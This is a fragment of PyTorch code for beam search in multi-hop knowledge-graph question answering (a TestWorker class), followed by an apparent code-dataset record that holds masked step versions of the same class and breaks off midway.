log_action_dist_b = log_action_dist[i]
r_space_b = r_space[i]
e_space_b = e_space[i]
unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id)
unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b)
k_prime = min(len(unique_e_space_b), k)
top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)
top_unique_idx = unique_idx[top_unique_idx2]
top_unique_beam_offset = top_unique_idx // action_space_size
top_r = r_space_b[top_unique_idx]
top_e = e_space_b[top_unique_idx]
next_r_list.append(top_r.unsqueeze(0))
next_e_list.append(top_e.unsqueeze(0))
log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))
top_unique_batch_offset = i * last_k
top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset
action_offset_list.append(top_unique_action_offset.unsqueeze(0))
next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)
next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)
log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float("inf"))
action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)
return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)
def sync_model(self):
self.model.load_state_dict(self.shared_model.state_dict())
def pad_and_cat_action_space(self, action_spaces, inv_offset):
db_r_space, db_e_space, db_action_mask = [], [], []
for (r_space, e_space), action_mask in action_spaces:
db_r_space.append(r_space)
db_e_space.append(e_space)
db_action_mask.append(action_mask)
r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]
e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]
action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]
action_space = ((r_space, e_space), action_mask)
return action_space
def pad_and_cat(self, a, padding_value, padding_dim=1):
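        # Right-pad every tensor along `padding_dim` to the longest size in
        # the list, then concatenate the padded tensors along dim 0.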
max_dim_size = max([x.size()[padding_dim] for x in a])
padded_a = []
for x in a:
if x.size()[padding_dim] < max_dim_size:
res_len = max_dim_size - x.size()[1]
pad = nn.ConstantPad1d((0, res_len), padding_value)
padded_a.append(pad(x))
else:
padded_a.append(x)
return torch.cat(padded_a, dim=0).cuda(self.gpu_id)
def unique_max(self, unique_x, x, values, marker_2D=None):
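        # For each entity in unique_x, take the max score over its duplicate
        # occurrences in x; chunking bounds the memory of the 2-D mask.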
unique_interval = 100
HUGE_INT = 1e31
unique_values, unique_indices = [], []
for i in range(0, len(unique_x), unique_interval):
unique_x_b = unique_x[i:i+unique_interval]
marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()
values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT
unique_values_b, unique_idx_b = values_2D.max(dim=1)
unique_values.append(unique_values_b)
unique_indices.append(unique_idx_b)
unique_values = torch.cat(unique_values).cuda(self.gpu_id)
unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)
return unique_values, unique_idx
def adjust_search_trace(self, search_trace, action_offset):
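        # Reorder every stored (relation, entity) step so the trace stays
        # aligned with the beams that survived the latest top-k selection.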
for i, (r, e) in enumerate(search_trace):
new_r = r[action_offset]
new_e = e[action_offset]
search_trace[i] = (new_r, new_e)
def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):
for i in range(self.batch_size):
top_k_edge_labels = []
for k, log_action_prob in enumerate(l_log_action_probs):
beam_size = len(log_action_prob)
for j in range(beam_size):
ind = i * beam_size + j
r = self.id2relation[int(l_search_trace[k][0][ind])]
e = self.id2entity[int(l_search_trace[k][1][ind])]
if r.endswith('_inverse'):
edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))
else:
edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))
if k == 0:
edge_label = self.id2entity[int(batch_head[i])] + edge_label
top_k_edge_labels.append(edge_label)
else:
top_k_edge_labels[j] += edge_label
for i, edge_label in enumerate(top_k_edge_labels):
print(i, edge_label)
print("*****************************")
|
normal
|
{
"blob_id": "c7333d838b87d4c275d9dbb6d7e3047c313b4bc0",
"index": 9212,
"step-1": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n <mask token>\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n 
action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = (r_space, e_space), action_mask\n return action_space\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n 
self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = 
(r_space, e_space), action_mask\n return action_space\n <mask token>\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWorker(mp.Process):\n <mask token>\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 1) + safe_log(\n action_dist)\n if self.return_trace:\n print(t)\n print(last_r, e_t)\n print('----')\n print(action_space[0])\n print(F.softmax(log_action_dist.view(-1)).view(self.\n batch_size * k, -1))\n print('------------------------')\n if t == self.max_hop - 1:\n action, log_action_prob, action_offset = (self.\n top_k_answer_unique(log_action_dist, action_space))\n else:\n action, log_action_prob, action_offset = self.top_k_action(\n log_action_dist, action_space)\n path_list, (h_t, c_t) = self.model.update_path(action,\n path_hidden, offset=action_offset)\n self.env.step(action, path_list, (h_t, c_t))\n if self.return_trace:\n rearrange_vector_list(l_log_action_probs, action_offset)\n l_log_action_probs.append(log_action_prob)\n self.adjust_search_trace(l_search_trace, action_offset)\n l_search_trace.append(action)\n batch_pred_e2 = action[1].view(self.batch_size, -1)\n batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)\n batch_hits1 = torch.sum(torch.gather(batch_answers, 1,\n batch_pred_e2_top1).view(-1)).item()\n if self.return_trace:\n 
self.print_search_trace(batch_head, l_search_trace,\n l_log_action_probs)\n return batch_hits1\n\n def top_k_action(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n log_action_prob, action_ind = torch.topk(log_action_dist, k)\n next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind\n ).view(-1)\n log_action_prob = log_action_prob.view(-1)\n action_beam_offset = action_ind // action_space_size\n action_batch_offset = (torch.arange(self.batch_size).cuda(self.\n gpu_id) * last_k).unsqueeze(1)\n action_offset = (action_batch_offset + action_beam_offset).view(-1)\n return (next_r, next_e), log_action_prob, action_offset\n\n def top_k_answer_unique(self, log_action_dist, action_space):\n full_size = len(log_action_dist)\n last_k = int(full_size / self.batch_size)\n (r_space, e_space), _ = action_space\n action_space_size = r_space.size()[1]\n r_space = r_space.view(self.batch_size, -1)\n e_space = e_space.view(self.batch_size, -1)\n log_action_dist = log_action_dist.view(self.batch_size, -1)\n beam_action_space_size = log_action_dist.size()[1]\n k = min(self.beam_size, beam_action_space_size)\n next_r_list, next_e_list = [], []\n log_action_prob_list = []\n action_offset_list = []\n for i in range(self.batch_size):\n log_action_dist_b = log_action_dist[i]\n r_space_b = r_space[i]\n e_space_b = e_space[i]\n unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self\n .gpu_id)\n unique_log_action_dist, unique_idx = self.unique_max(\n unique_e_space_b, e_space_b, log_action_dist_b)\n k_prime = min(len(unique_e_space_b), k)\n top_unique_log_action_dist, top_unique_idx2 = torch.topk(\n unique_log_action_dist, k_prime)\n top_unique_idx = unique_idx[top_unique_idx2]\n top_unique_beam_offset = top_unique_idx // action_space_size\n top_r = r_space_b[top_unique_idx]\n top_e = e_space_b[top_unique_idx]\n next_r_list.append(top_r.unsqueeze(0))\n next_e_list.append(top_e.unsqueeze(0))\n log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0)\n )\n top_unique_batch_offset = i * last_k\n top_unique_action_offset = (top_unique_batch_offset +\n top_unique_beam_offset)\n action_offset_list.append(top_unique_action_offset.unsqueeze(0))\n next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)\n next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)\n log_action_prob = self.pad_and_cat(log_action_prob_list,\n padding_value=-float('inf'))\n action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)\n return (next_r, next_e), log_action_prob.view(-1), action_offset.view(\n -1)\n\n def sync_model(self):\n self.model.load_state_dict(self.shared_model.state_dict())\n\n def pad_and_cat_action_space(self, action_spaces, inv_offset):\n db_r_space, db_e_space, db_action_mask = [], [], []\n for (r_space, e_space), action_mask in action_spaces:\n db_r_space.append(r_space)\n db_e_space.append(e_space)\n db_action_mask.append(action_mask)\n r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]\n e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]\n action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[\n inv_offset]\n action_space = 
(r_space, e_space), action_mask\n return action_space\n\n def pad_and_cat(self, a, padding_value, padding_dim=1):\n max_dim_size = max([x.size()[padding_dim] for x in a])\n padded_a = []\n for x in a:\n if x.size()[padding_dim] < max_dim_size:\n res_len = max_dim_size - x.size()[1]\n pad = nn.ConstantPad1d((0, res_len), padding_value)\n padded_a.append(pad(x))\n else:\n padded_a.append(x)\n return torch.cat(padded_a, dim=0).cuda(self.gpu_id)\n\n def unique_max(self, unique_x, x, values, marker_2D=None):\n unique_interval = 100\n HUGE_INT = 1e+31\n unique_values, unique_indices = [], []\n for i in range(0, len(unique_x), unique_interval):\n unique_x_b = unique_x[i:i + unique_interval]\n marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()\n values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D\n ) * HUGE_INT\n unique_values_b, unique_idx_b = values_2D.max(dim=1)\n unique_values.append(unique_values_b)\n unique_indices.append(unique_idx_b)\n unique_values = torch.cat(unique_values).cuda(self.gpu_id)\n unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)\n return unique_values, unique_idx\n\n def adjust_search_trace(self, search_trace, action_offset):\n for i, (r, e) in enumerate(search_trace):\n new_r = r[action_offset]\n new_e = e[action_offset]\n search_trace[i] = new_r, new_e\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass TestWorker(mp.Process):\n\n def __init__(self, args, worker_id, env, d_entity_neighours,\n d_entity2bucketid, d_action_space_buckets, d_entity2id,\n d_relation2id, reqa_checkpoint_path, d_results, word_num,\n entity_num, relation_num, keqa_checkpoint_path, return_trace=False):\n super().__init__(name='test-worker-%02d' % worker_id)\n self.args = args\n self.seed = args.seed + worker_id\n self.fix_batch_size = args.batch_size\n self.use_keqa_vector = args.use_keqa_vector\n self.max_hop = args.max_hop\n self.beam_size = args.beam_size\n self.return_trace = return_trace\n self.d_entity_neighours = d_entity_neighours\n self.d_entity2bucketid = d_entity2bucketid\n self.d_action_space_buckets = d_action_space_buckets\n self.id2entity = index2word(d_entity2id)\n self.id2relation = index2word(d_relation2id)\n self.worker_id = worker_id\n self.gpu_id = self.worker_id % get_num_gpus()\n self.env = env\n self.d_results = d_results\n self.reqa_checkpoint_path = reqa_checkpoint_path\n self.word_num = word_num\n self.entity_num = entity_num\n self.relation_num = relation_num\n self.keqa_checkpoint_path = keqa_checkpoint_path\n\n def run(self):\n set_seed(self.seed)\n self.model = Policy_Network(self.args, self.word_num, self.\n entity_num, self.relation_num, self.keqa_checkpoint_path, self.\n gpu_id)\n self.model.load(self.reqa_checkpoint_path)\n self.model.cuda(self.gpu_id)\n self.model.eval()\n self.env.set_model(self.model)\n self.env.set_gpu_id(self.gpu_id)\n total_data_num = len(self.env.d_dataset)\n hits_1_num = 0\n with torch.no_grad():\n for example_id in tqdm(range(0, len(self.env.d_dataset), self.\n fix_batch_size), desc=self.name, position=self.worker_id):\n idx = range(example_id, example_id + self.fix_batch_size)\n self.env.reset(idx)\n self.batch_size = self.env.batch_size\n batch_hits1 = self.rollout()\n hits_1_num += batch_hits1\n hits_1_result = 1.0 * hits_1_num / total_data_num\n self.d_results['hits@1'] = hits_1_result\n\n def rollout(self):\n batch_question, batch_question_len, batch_head, batch_answers = (self\n .env.return_batch_data())\n if self.return_trace:\n l_search_trace = []\n l_log_action_probs = []\n batch_pred_vector = None\n if self.use_keqa_vector:\n batch_pred_vector = self.model.get_anticipated_entity_vector(\n batch_head, batch_question, batch_question_len, self.\n d_entity_neighours)\n log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)\n for t in range(self.max_hop):\n path_trace, path_hidden = self.env.observe()\n last_r, e_t = path_trace[-1]\n batch_path_hidden = path_hidden[-1][0][-1, :, :]\n k = int(e_t.size()[0] / self.batch_size)\n beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(\n self.batch_size * k, -1)\n beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k\n ).view(self.batch_size * k)\n beam_pred_vector = None\n if self.use_keqa_vector:\n beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1,\n k, 1).view(self.batch_size * k, -1)\n db_outcomes, _, _, inv_offset = self.model.transit(t, e_t,\n beam_question, beam_question_len, batch_path_hidden, self.\n d_entity2bucketid, self.d_action_space_buckets, last_r, \n False, beam_pred_vector)\n db_action_spaces = [action_space for action_space, _ in db_outcomes\n ]\n db_action_dist = [action_dist for _, action_dist in db_outcomes]\n action_space = self.pad_and_cat_action_space(db_action_spaces,\n inv_offset)\n action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[\n inv_offset]\n log_action_dist = log_action_prob.view(-1, 
